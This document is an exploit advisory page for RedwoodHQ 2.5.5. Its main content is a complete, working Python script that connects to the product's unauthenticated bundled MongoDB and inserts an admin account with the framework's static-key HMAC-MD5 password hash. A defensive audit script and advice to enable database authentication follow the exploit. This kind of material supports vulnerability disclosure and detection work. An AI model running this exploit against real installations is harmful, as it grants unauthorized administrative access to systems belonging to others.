RedwoodHQ 2.5.5 Authentication Bypass

16 Jun 2019 | Reported by EthicalHCOP | Type: packetstorm | Source: packetstormsecurity.com

RedwoodHQ 2.5.5 authentication bypass: exploit that creates an admin user without authentication.

Code
```python
#!/usr/bin/python3
# -*- encoding: utf-8 -*-

# Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 14-june-2019
# Exploit Author: EthicalHCOP
# Version: 2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link: https://redwoodhq.com/redwood-download/
# Tested on: Ubuntu and Windows.
# Twitter: @EthicalHcop
# Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
#
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool has its own Mongo launcher.
# The problem is that this vendor database doesn't require any authentication to read its data.
# So, I use the same syntax that the framework uses to create my admin user on the database and access the tool
#
# POC: https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient


def CreateHMAC(Pass):
    # Password hash format used by the framework: HMAC-MD5 keyed with the static string 'redwood'
    message = bytes(Pass, encoding='utf8')
    secret = bytes('redwood', encoding='utf8')
    digest = hmac.new(secret, message, hashlib.md5)
    return digest.hexdigest()


def DbConnect(ip, port):
    # No credentials in the URI: the bundled MongoDB accepts unauthenticated connections
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con


def DbDisconnect(con):
    con.close()


def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    # User document in the same shape the framework stores
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)


def start():
    parser = optparse.OptionParser('usage %prog -H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string',
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string',
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if ip is None:
        print("Insert Host")
        exit(0)
    if port is None:
        # Default MongoDB port
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: " + str(e))


if __name__ == '__main__':
    start()
```
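A defensive counterpart to the script above, added here as an example and not part of the original advisory or of RedwoodHQ: it audits user documents exported from your own instance's `automationframework.users` collection for admin accounts that are not on an approved list, or whose stored hash equals the HMAC-MD5 of their own username under the static key `redwood`. The `approved_admins` set, the function names, the `Tester` role and the sample documents are assumptions constructed for illustration.

```python
import hashlib
import hmac

# Static key and digest as shown in the exploit's CreateHMAC()
REDWOOD_HMAC_KEY = b"redwood"


def redwood_hash(password):
    """Reproduce the stored password format: HMAC-MD5 keyed with 'redwood'."""
    return hmac.new(REDWOOD_HMAC_KEY, password.encode("utf8"), hashlib.md5).hexdigest()


def audit_users(user_docs, approved_admins):
    """Return (username, reason) findings for documents from the users collection."""
    findings = []
    for doc in user_docs:
        if doc.get("role") != "Admin":
            continue
        username = str(doc.get("username", ""))
        # An admin nobody provisioned is the direct artifact of an unauthenticated insert
        if username not in approved_admins:
            findings.append((username, "admin account not on approved list"))
        # The published script sets password == username ('Badmin'/'Badmin')
        if doc.get("password") == redwood_hash(username):
            findings.append((username, "password equals username"))
    return findings


# Constructed sample documents (hypothetical), in the field layout shown in the exploit
SAMPLE_USERS = [
    {"name": "admin", "username": "admin", "role": "Admin", "tag": [],
     "status": "", "password": redwood_hash("a-long-constructed-passphrase")},
    {"name": "qa1", "username": "qa1", "role": "Tester", "tag": [],
     "status": "", "password": redwood_hash("another-constructed-passphrase")},
    {"name": "Badmin", "username": "Badmin", "role": "Admin", "tag": [],
     "status": "", "password": redwood_hash("Badmin")},
]

if __name__ == "__main__":
    for user, reason in audit_users(SAMPLE_USERS, approved_admins={"admin"}):
        print(f"[!] {user}: {reason}")
```

A finding means the database was writable by something other than the application; the underlying fix is to enable MongoDB authentication and restrict network access to the database port.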
